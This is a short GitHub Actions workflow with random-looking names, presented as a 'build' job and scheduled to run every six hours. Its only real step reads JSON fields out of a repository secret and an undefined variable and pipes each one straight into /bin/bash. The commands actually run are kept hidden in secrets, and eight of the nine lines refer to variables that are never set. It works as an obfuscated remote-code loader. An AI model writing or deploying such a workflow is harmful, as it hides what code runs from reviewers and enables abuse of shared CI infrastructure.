name: fananghais

on:
  workflow_dispatch:
  schedule:
    - cron: '32 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fananghais
        env:
          asvtu53: ${{ secrets.asvtu53 }}
        run: |
          echo $asvtu53 | jq -r .sd1688 | /bin/bash
          echo $qeck48 | jq -r .kwdqk888 | /bin/bash
          echo $cncy491 | jq -r .wy02849 | /bin/bash
          echo $mbd194 | jq -r .kotb7317 | /bin/bash
          echo $walj57 | jq -r .fsniv524 | /bin/bash
          echo $joz5857 | jq -r .yn26285 | /bin/bash
          echo $jr401 | jq -r .axnk1 | /bin/bash
          echo $n0559 | jq -r .jl24 | /bin/bash
          echo $ued4 | jq -r .oerv7327 | /bin/bash

